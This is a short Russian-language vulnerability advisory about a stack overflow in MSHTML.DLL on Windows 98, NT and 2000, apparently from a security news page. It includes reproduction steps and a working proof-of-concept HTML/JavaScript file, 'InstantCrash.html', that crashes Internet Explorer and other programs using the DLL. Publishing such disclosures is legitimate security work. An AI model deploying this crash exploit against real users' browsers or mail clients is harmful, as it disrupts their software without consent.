Найдена уязвимость в MSHTML DLL. Возможно «убить» эту DLL с помощью стек-переполнения, используя скрипт в файле HTML. Это дает возможность «убивать» Internet Explorer, и, возможно, даже выполнять произвольный программный код на машине пользователя (хотя это еще не проверено).

Cистемы уязвимы:
Windows 98
Windows NT
Windows 2000

Данный баг эффективен против любой программы, использующей MSHTML.DLL (Internet Explorer, Outlook/Outlook Express и другие мыльницы с поддержкой HTML). Этот баг испытан, когда имеется дело с множественными окнами объектов, где одно получает данные. Чтобы воспроизвести ошибку, создайте объект JavaScript, установите свойство объекта из окна (этого объекта) получающего данные, удалите объект, и создайте его снова.

Exploit:
———InstantCrash.html————
<iframe id=test style=»display:none»></iframe>
<script>
Larholm = {}; // Object literal
test.document.open(); // Stream data
test.document.write(«<s»+»cript>top.Larholm.test=0</s»+»cript>»);
delete Larholm;
Larholm = {}; // Crash
</script>
———————————————



Оставить мнение